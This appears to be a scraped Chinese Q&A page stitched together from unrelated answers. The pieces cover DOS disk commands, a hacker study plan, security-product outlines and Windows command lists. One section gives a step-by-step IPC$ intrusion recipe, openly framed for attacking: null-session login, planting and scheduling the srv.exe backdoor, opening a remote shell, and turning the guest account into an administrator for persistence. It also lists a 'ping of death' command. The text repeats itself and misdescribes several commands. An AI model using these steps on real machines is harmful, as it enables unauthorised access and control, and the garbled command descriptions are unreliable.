(警告:所有數據在C盤上,將會丟失,確實要繼續格式化嗎?)
(2)若是對軟盤進行格式化,則會如下提示:Insert mew diskette for drive A;
and press ENTER when ready…
(在A驅中插入新盤,准備好後按回車鍵)。
(3)選用[/S]參數,將把DOS系統文件IO.SYS
、MSDOS.SYS及COMMAND.COM復制到磁碟上,使該磁碟可以做為DOS啟動盤。若不選用/S參數,則格式化後的磙盤只能讀寫信息,而不能做為啟動盤;
(4)選用[/4]參數,在1.2MB的高密度軟碟機中格式化360KB的低密度盤;
(5)選用[/Q]參數,快速格式化,這個參數並不會重新劃分磁碟的磁軌貌岸然和扇區,只能將磁碟根目錄、文件分配表以及引導扇區清成空白,因此,格式化的速度較快。
(6)選用[/U]參數,表示無條件格式化,即破壞原來磁碟上所有數據。不加/U,則為安全格式化,這時先建立一個鏡象文件保存原來的FAT表和根目錄,必要時可用UNFORRMAT恢復原來的數據。
(二)UNformAT恢復格式化命令
1.功能:對進行過格式化誤操作丟失數據的磁碟進行恢復。
2.類型:外部命令
3.格式:UNformAT〈盤符〉[/L][/U][/P][/TEST]
4.使用說明:用於將被「非破壞性」格式化的磁碟恢復。根目錄下被刪除的文件或子目錄及磁碟的系統扇區(包括FAT、根目錄、BOOT扇區及硬碟分區表)受損時,也可以用UNformAT來搶救。
(1)選用/L參數列出找到的子目錄名稱、文件名稱、大孝日期等信息,但不會真的做formAT工作。
(2)選用/P參數將顯示於屏幕的報告(包含/L參數所產生的信息)同時也送到列印機。運行時屏幕會顯示:「Print out will
be sent to LPT1」
(3)選用/TEST參數只做模擬試驗(TEST)不做真正的寫入動作。使用此參數屏幕會顯示:「Simulation only」
(4)選用/U參數不使用MIRROR映像文件的數據,直接根據磁碟現狀進行UNformAT。
(5)選用/PSRTN;修復硬碟分區表。
若在盤符之後加上/P、/L、/TEST之一,都相當於使用了/U參數,UNformAT會「假設」此時磁碟沒有MIRROR映像文件。
注意:UNformAT對於剛formAT的磁碟,可以完全恢復,但formAT後若做了其它數據的寫入,則UNformAT就不能完整的救回數據了。UNformAT並非是萬能的,由於使用UNformAT會重建FAT與根目錄,所以它也具有較高的危險性,操作不當可能會擴大損失,如果僅誤刪了幾個文件或子目錄,只需要利用UNDELETE就夠了。
三) CHKDSK——檢查磁碟當前狀態命令
1.功能:顯示磁碟狀態、內存狀態和指定路徑下指定文件的不連續數目。
2.類型:外部命令
3.格式:CHKDSK [盤符:][路徑][文件名][/F][/V]
4.使用說明:
(1)選用[文件名]參數,則顯示該文件佔用磁碟的情況;
(2)選[/F]參數,糾正在指定磁碟上發現的邏輯錯誤;
(3)選用[/V]參數,顯示盤上的所有文件和路徑。
(四)DISKCOPY——整盤復制命令
1.功能:復制格式和內容完全相同的軟盤。
2.類型:外部命令
3.格式:DISKCOPY[盤符1:][盤符2:]
4.使用說明:
(1)如果目標軟盤沒有格式化,則復制時
C. 常用的windows滲透命令有哪些
基礎: 如何去學習 ·要有學習目標 ·要有學習計劃 ·要有正確的心態 ·有很強的自學能力 學習目標 ·1.明確自己的發展方向(你現在或者將來要做什麼,程序員?安全專家?網路黑客等) ·2.自己目前的水平和能力有多高 ·能簡單操作windows2000 ·能簡單配置windows2000的一些服務 ·能熟練的配置Windows2000的各種服務 ·能熟練配置win2000和各種網路設備聯網 ·能簡單操作Linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統 ·能配置cicso,huawei,3com,朗迅等網路設備 ·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl ·能簡單編寫Asp,Php,Cgi和script,shell腳本 ·3.必須學會不相信態度,尊重各種各樣的能力 ·不要為那些裝模做樣的人浪費時間 ·尊重別人的能力, ·會享受提高自己能力的樂趣. ·在知道了自己的水平和能力之後就要開始自己的目標了 ·--------安全專家 ·--------黑客 ·--------高級程序員 ·黑客是建設網路,不是破壞網路, 破壞者是駭客; ·黑客有入侵的技術,但是他們是維護網路的,所以和安全專家是差不多的; ·因為懂得如何入侵才知道如何維護 ·因為懂得如何維護才更要了解如何入侵 ·這是 黑客與安全專家的聯系 ·但,他們都是在會編程的基礎上成長的! ·下面我們開始我們的學習計劃! 學習計劃 有了學習計劃才能更有效的學習 安全學習計劃 不奢求對win98有多麼精通,我們也不講解win98如何應用,如何精通,我們的起步是win2000 s erver,這是我們培訓的最低標准,你對英語有一定的了解也是必不可少 最基礎 ·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2 000可以在安裝的時候分區,格式化硬碟, 可以定製安裝,可以定製自己需要安裝的一些組件 ,如果有網路適配器,可以直接加入域中 學習點:NTFS和FAT32分區的不同 各個組件的作用 域的定義 ·b.知道如何開,關機 知道注銷的用處 ·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra m Files ·d.知道管理工具裡面各個組件的定義 ·e.學會應用命令提示符cmd(dos) ·f.知道計算機管理裡面的各個選項的不通 ·g.知道win2000強大的網路管理功能 ·h.能非常熟練的操作win2000 ·i.知道IP地址,子網掩碼,網關和MAC的區別 進階 ·A.配置IIS,知道各個選項的作用 ·B.配置DNS,DHCP ·C.配置主控制域,輔助域 ·D.配置DFS ·E.配置路由和遠程訪問 ·F.配置安全策略IPSEC ·G.配置service(服務) ·H.配置磁碟管理,磁碟分額 ·i. 配置RAID(0,1,0+1,5) ·J.路由器的安裝與簡單配置 ·K.交換機的安裝與簡單配置 ·L.常見的VPN,VLAN,NAT配置 ·M.配置常見的企業級防火牆 ·N.配置常見的企業級防病毒軟體 高級 ·之前我們學到的是任何一個想成為網路安全專家和黑客基本知識中的一部分 ·你作到了嗎?? ·如果你做到了,足以找到一份很不錯的工作! 配置負載均衡 ·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISASERVER) · ·配置三層交換網路 · ·配置各種復雜的網路環境 ·能策劃一個非常完整的網路方案 · ·能獨自組建一個大型的企業級網路 · ·能迅速解決網路中出現的各種疑難問題 結束 ·在你上面的都學好了,你已經是一個高級人才了,也是我們VIP培訓的目標! ·可以找到一份非常好的工作 ·不會再因為給女朋友買不起玫瑰而發愁了! 安全導讀: ·系統安全服務(SYSTEM) ·防火牆系統(FIREWALL) ·入侵檢測(IDS) ·身份驗證(CA) ·網站監控和恢復(WEBSITE) ·安全電子商務(E-BUSINESS) ·安全電子郵件(E-MAIL) ·安全辦公自動化(OA) ·Internet訪問和監控(A&C) ·病毒防範(VIRUS) ·虛擬區域網(VPN) 系統安全服務 ·系統安全管理 ·系統安全評估 ·系統安全加固 ·系統安全維護 ·安全技能學習 系統安全管理 ·信息系統安全策略 ·信息系統管理員安全手冊 ·信息系統用戶安全手冊 ·緊急事件處理流程 系統安全評估 1、系統整體安全分析 · 分析用戶的網路拓撲結構,以找出其結構性及網路 配置上存在的安全隱患。 · 通過考察用戶信息設備的放置場地,以使得設備物理上是安全的。 · 分析用戶信息系統的管理、使用流程,以使得系統 能夠安全地管理、安全地使用 2、主機系統安全檢測 · 通過對主機進行安全掃描,以發現系統的常見的安全漏洞。 · 對於特定的系統,採用特別的工具進行安全掃描。 · 根據經驗,對系統存在的漏洞進行綜合分析。 · 給出系統安全漏洞報告。 · 指出各個安全漏洞產生的原因以及會造成的危險。 · 給出修復安全漏洞的建議 3、網路設備安全檢測 · 通過對網路進行安全掃描,以發現網路設備的安全漏洞。 · 根據經驗,對網路設備存在的漏洞進行綜合析。 · 給出網路設備安全漏洞報告。 · 指出各個安全漏洞產生的原因以及會造成的險。 · 給出修復安全漏洞的建議。 安全系統加固 ·為用戶系統打最新安全補丁程序。 ·為用戶修復系統、網路中的安全漏洞。 ·為用戶去掉不必要的服務和應用系統。 ·為用戶系統設置用戶許可權訪問策略。 ·為用戶系統設置文件和目錄訪問策略。 ·針對用戶系統應用進行相應的安全處理。 安全系統維護 ·防火牆系統維護,安全日誌分析 ·IDS系統維護,安全日誌分析 ·VPN系統維護,安全日誌分析 ·認證系統維護,安全日誌分析 ·伺服器、主機系統,安全日誌分析 ·其它各類安全設施維護及日誌分析 安全技能培訓 ·網路安全基礎知識 ·網路攻擊手段演示和防範措施 ·防火牆的原理和使用 ·VPN的原理和使用 ·漏洞掃描工具的原理和使用 ·IDS(入侵檢測系統)的原理和使用 ·身份認證系統的原理和使用 ·防病毒產品的原理和使用 ·系統管理員安全培訓 ·一般用戶安全培訓 防火牆系統 ·防火牆的定義 ·防火牆的分類 ·包過濾防火牆 ·應用網關防火牆 ·狀態檢測防火牆 ·一般企業防火牆配置 ·政府機構防火牆配置 ·涉密網路保密網關配置 ·高可用性和負載均衡防火牆系統 ·高速防火牆系統 防火牆的定義 ·用以連接不同信任級別網路的設備。 ·用來根據制定的安全規則對網路間的通信進行控制 防火牆的分類 ·包過濾 (Packet Filters) ·應用網關 (Application Gateways) ·狀態檢測(Stateful Inspection) 包過濾防火牆 ·包 過 濾 技 術 ·主要在路由器上實現,根據用戶定義的內容(如IP地址、埠號)進行過濾。包過濾在網 絡層進行包檢查與應用無關。 · 優 點 · 具有良好的性能和可伸縮性。 · 缺點 · 由於包過濾技術是對應用不敏感的,無法理解特定通訊的含義,因而安全性很差。 應用網關防火牆 ·應用網關技術 ·第二代防火牆技術,其在應用的檢查方面有了較大的改進,能監測所有應用層,同時對應 用「內容」(Content Information)的含義引入到了防火牆策略的決策處理。 · 優點 · 安全性比較高。 · 缺點 · 1、該方法對每一個請求都必須建立兩個連接,一個從客戶端到防火牆系統,另一個從 防火牆系統到伺服器,這會嚴重影響性能。 · 2、防火牆網關暴露在攻擊者之中。 · 3、對每一個代理需要有一個獨立的應用進程或 daemon 來處理, 這樣擴展性和支持 新應用方面存在問題。 檢測狀態防火牆 ·屬第三代防火牆技術,克服了以上兩種方法的缺點,引入了OSI全七層監測能力,同時 又能保持 Client/Server的體系結構,也即對用戶訪問是透明的。 ·防火牆能保護、限制其他用戶對防火牆網關本身的訪問。 ·狀態檢測技術在網路層截獲數據包後交給INSPECT Engine,通過 INSPECT Engine 可以從數據包中抽取安全決策所需的所有源於應用層中的狀態相關信息,並在動態狀態表中 維持這些信息以提供後繼連接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸縮性的解決方案。 入侵檢測系統 ·處理攻擊時遇到的典型問題 ·解決入侵的方法和手段 ·基於網路的入侵檢測 ·基於主機的入侵檢測 ·入侵檢測系統典型配置 處理攻擊時遇到的問題 ·獲得的信息不足 ·不知到網路上發生了什麼事。 ·無法判定系統是否已經被入侵。 ·信息不準確 ·人員少 ·沒有足夠的人員維護管理。 ·缺乏規范的處理程序 ·發現攻擊時如何反應? ·下一步該如何處理? 解決入侵的方法和手段 ·採用入侵實時入侵監控系統(IDS) ·對系統、網路中發生的事件進行實時監控。 ·當發生入侵事件時能即時反應。 ·對入侵事件進行詳細記錄並跟蹤。 基於主機的入侵檢測 ·軟體模塊安裝在包含有重要數據的主機上 ·監視操作系統的日誌以發現攻擊的特徵。 ·監視代理所處主機上的所有進程和用戶. ·監視暴力登錄攻擊(brute-force login), 試圖改變或繞過安全設定,及特權的濫用等 ·當新的日誌產生時,為了減小對CPU的影響,代理程序暫時中斷。 基於網路的入侵檢測 ·軟體安裝在專門的主機上,放置於關鍵的網段 ·將配置該軟體主機的網卡設置為混雜模式,使得該主機能接受網段上所有的包。 ·分析數據包以判斷是否有黑客攻擊。 ·監視網段上的所有數據。 ·對網路的流量無任何影響。 ·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s cans等攻擊。 身份認證系統 ·用戶身份認證的方法 ·不同認證方法的安全級別 ·用戶身份認證的常用方式 ·解決問題的方法 ·目前比較成熟的雙因素認證方法 用戶身份驗證 ·你知道的一些東西 · 密碼, 身份證號,生日 ·你有的一些東西 · 磁卡, 智能卡,令牌, 鑰匙 ·你獨有的一些東西 · 指紋,聲音,視網膜 密碼是不安全的 ·可以破解密碼的工具太多 ·大多密碼在網路中是明文傳輸的 ·密碼可以網路離線時被窺測 ·密碼和文件從PC和伺服器上被轉移了 ·好記的密碼容易被猜到,不易猜測的密碼又太難記 解決方法 ·使用混合的工具:如IC卡+PIN 網站監控與恢復系統 ·典型的Web伺服器應用 ·Web伺服器存在的安全問題 ·網站安全解決方法 典型web伺服器應用 ·Internet-->路由器-->防火牆-->web站點 · | · | · 內部網 ·所有的放在防火牆後面 Web伺服器存在的安全問題 ·網頁被非法篡改是網站內容提供者最頭痛的問題。在採用防火牆後,Web伺服器本身的漏 洞成為了網站被黑的主要問題。 ·Web應用伺服器(如IIS,Apache中存在著大量的安 全漏洞.) ·用戶自己開發的CGI、ASP、PHP應用中存在著大量潛在的漏洞。 網站安全 ·採用Web伺服器監控與恢復系統 ·該系統提供對網站文件內容的實時監控,發現被改動後立即報警並自動恢復。 電子商務安全系統 ·典型的電子商務應用 ·電子商務中存在的安全問題 ·電子商務的安全解決方法 ·實時數據交換系統 典型電子商務應用 ·Internet--->防火牆--->Web伺服器 · || | · || | · 內部網(資料庫) 電子商務中存在的安全問題 ·1、Web伺服器端 ·Web應用伺服器(如IIS、Apache中存在著大量的安全漏洞。用戶自己開發的CGI、ASP、PHP應用中存在著潛在的漏洞。 ·黑客通過這些漏洞攻擊Web伺服器,可非法篡改網頁,造成惡劣影響,動搖了電子商務使用者的信心。 ·甚至可獲得Web伺服器上大量的敏感資料,如用戶的信用卡號,用以連接內部資料庫的帳號和口令。 ·可能通過控制Web伺服器,來攻擊內部資料庫。 電子商務中存在的安全問題 ·2、SSL協議 ·SSL加密強度低。由於瀏覽器默認的加密模塊只支持40位的低強度加密,而且即使在瀏覽器中安裝更高位的加密模塊,由於WEB伺服器不提供對高位SSL鏈接的支持同樣無法實現高強 度SSL加密鏈接。 ·無法解決電子商務中的用戶簽名。SSL鏈接建立WEB伺服器和用戶瀏覽器之間的安全通道只能保證在安全通道內的信息不被竊聽或篡改,並不能對用戶發送的信息進行簽名以保證信息的有效性和不可抵賴性,而這正是電子商務中必須解決的問題。 電子商務的安全解決方法 ·將WEB伺服器分為兩部分:一般內容的WEB伺服器和交易WEB伺服器。 ·一般內容的WEB伺服器放置在DMZ區內,採用WEB站點監控和恢復系統保護,防止主頁被非法改動。 ·交易WEB伺服器放置在內部網內,通過一台物理分隔的實時數據交換系統將其與DMZ區相 連。 ·在客戶機和伺服器端安裝SSL代理,從而獲得128位的高強度加密通道 實時數據交換系統 ·將系統外部 Web伺服器和內部應用Web伺服器物理隔開. ·外部Web伺服器用於存放一般的信息,內部Web服 務器用於存放敏感信息,並和內部數據
D. 黑客常用的網路命令有哪些呀 分別是什麼呀 怎麼用的呀
net user hei lovechina /add 加一個hei的用戶密碼為lovechina
net localgroup Administrators hei /add 把他加入Administrator組
net start telnet 開對方的TELNET服務
net use z:\127.0.0.1c$ 映射對方的C盤
net user guest /active:yes 將Guest用戶激活
net user guest lovechina 把guest的密碼改為lovechina
net user 查看所有用戶列表
net user 用戶名 /delete 刪掉
net time \\127.0.0.1 得到對方的時間,
get c:\index.htm d:\ 上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
index.htm \\127.0.0.1\c$\index.htm 本地C盤下的index.htm復制到127.0.0.1的C盤
NET VIEW 顯示域列表、計算機列表或指定計算機的共
計算機運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------XP自帶區域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查介面
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控製程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
Nslookup-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁碟檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元映射表
cliconfg-------SQL SERVER 客戶端網路實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------**整理
ciadv.msc------索引服務程序
osk------------打開屏幕鍵盤
odbcad32-------ODBC數據源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令
iexpress-------木馬捆綁工具,系統自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略
E. 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有
一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;
下面純手打,上面是度娘給的
taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組
F. 關於終端的一些基本命令語句
html5入門知識點:
1.osx終端命令:
ls---查看當前的目錄信息
clear---清除(作用是保持界面干凈整潔)
cd目錄名稱---進入到某目錄
cd.. ---返回上級目錄(可以通過../../越級返回目錄)
mkdir目錄名稱 創建目錄
touch文件名 創建文件(記得確認後綴-文件類型)
rm-rf文件名|目錄名稱(慎用)
pwd顯示當前的路徑信息
mv原名稱 新名稱
open應用名稱
2.創建HTML標簽
3.創建文檔的頭部和身體
4.標簽必須閉合
5.標簽可以嵌套 嵌套標簽必須縮進(tab鍵)
6.標簽有屬性(自有屬性,和自定義屬性)
7.標簽不區分大小寫
G. 命令有哪些 黑客CMD Ping命令大全
1. gpedit.msc-----組策略
2. sndrec32-------錄音機
3. Nslookup-------IP地址偵測器 ,是一個 監測網路中 DNS 伺服器是否能正確實現域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中卻沒有集成這一個工具。
4. explorer-------打開資源管理器
5. logoff---------注銷命令
6. shutdown-------60秒倒計時關機命令
7. lusrmgr.msc----本機用戶和組
8. services.msc---本地服務設置
9. oobe/msoobe /a----檢查XP是否激活
10. notepad--------打開記事本
11. cleanmgr-------垃圾整理
12. net start messenger----開始信使服務
13. compmgmt.msc---計算機管理
14. net stop messenger-----停止信使服務
15. conf-----------啟動netmeeting
16. dvdplay--------DVD播放器
17. charmap--------啟動字元映射表
18. diskmgmt.msc---磁碟管理實用程序
19. calc-----------啟動計算器
20. dfrg.msc-------磁碟碎片整理程序
21. chkdsk.exe-----Chkdsk磁碟檢查
22. devmgmt.msc--- 設備管理器
23. regsvr32 /u *.dll----停止dll文件運行
24. drwtsn32------ 系統醫生
25. rononce -p----15秒關機
26. dxdiag---------檢查DirectX信息
27. regedt32-------注冊表編輯器
28. Msconfig.exe---系統配置實用程序
29. rsop.msc-------組策略結果集
30. mem.exe--------顯示內存使用情況
31. regedit.exe----注冊表
32. winchat--------XP自帶區域網聊天
33. progman--------程序管理器
34. winmsd---------系統信息
35. perfmon.msc----計算機性能監測程序
36. winver---------檢查Windows版本
37. sfc /scannow-----掃描錯誤並復原
38. taskmgr-----任務管理器(2000/xp/2003
40. wmimgmt.msc----打開windows管理體系結構(WMI)
41. wupdmgr--------windows更新程序
42. wscript--------windows腳本宿主設置
43. write----------寫字板
45. wiaacmgr-------掃描儀和照相機向導
46. winchat--------XP自帶區域網聊天
49. mplayer2-------簡易widnows media player
50. mspaint--------畫圖板
51. mstsc----------遠程桌面連接
53. magnify--------放大鏡實用程序
54. mmc------------打開控制台
55. mobsync--------同步命令
57. iexpress-------木馬捆綁工具,系統自帶
58. fsmgmt.msc-----共享文件夾管理器
59. utilman--------輔助工具管理器
61. dcomcnfg-------打開系統組件服務
62. ddeshare-------打開DDE共享設置
110. osk------------打開屏幕鍵盤
111. odbcad32-------ODBC數據源管理器
112. oobe/msoobe /a----檢查XP是否激活
68. ntbackup-------系統備份和還原
69. narrator-------屏幕「講述人」
70. ntmsmgr.msc----移動存儲管理器
71. ntmsoprq.msc---移動存儲管理員操作請求
72. netstat -an----(TC)命令檢查介面
73. syncapp--------創建一個公文包
74. sysedit--------系統配置編輯器
75. sigverif-------文件簽名驗證程序
76. ciadv.msc------索引服務程序
77. shrpubw--------創建共享文件夾
78. secpol.msc-----本地安全策略
79. syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
80. services.msc---本地服務設置
81. Sndvol32-------音量控製程序
82. sfc.exe--------系統文件檢查器
83. sfc /scannow---windows文件保護
84. ciadv.msc------索引服務程序
85. tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
86. taskmgr--------任務管理器
87. eventvwr-------事件查看器
88. eudcedit-------造字程序
89. compmgmt.msc---計算機管理
90. packager-------對象包裝程序
91. perfmon.msc----計算機性能監測程序
92. charmap--------啟動字元映射表
93. cliconfg-------SQL SERVER 客戶端網路實用程序
94. Clipbrd--------剪貼板查看器
95. conf-----------啟動netmeeting
96. certmgr.msc----證書管理實用程序
97. regsvr32 /u *.dll----停止dll文件運行
98. regsvr32 /u zipfldr.dll------取消ZIP支持
99. cmd.exe--------CMD命令提示符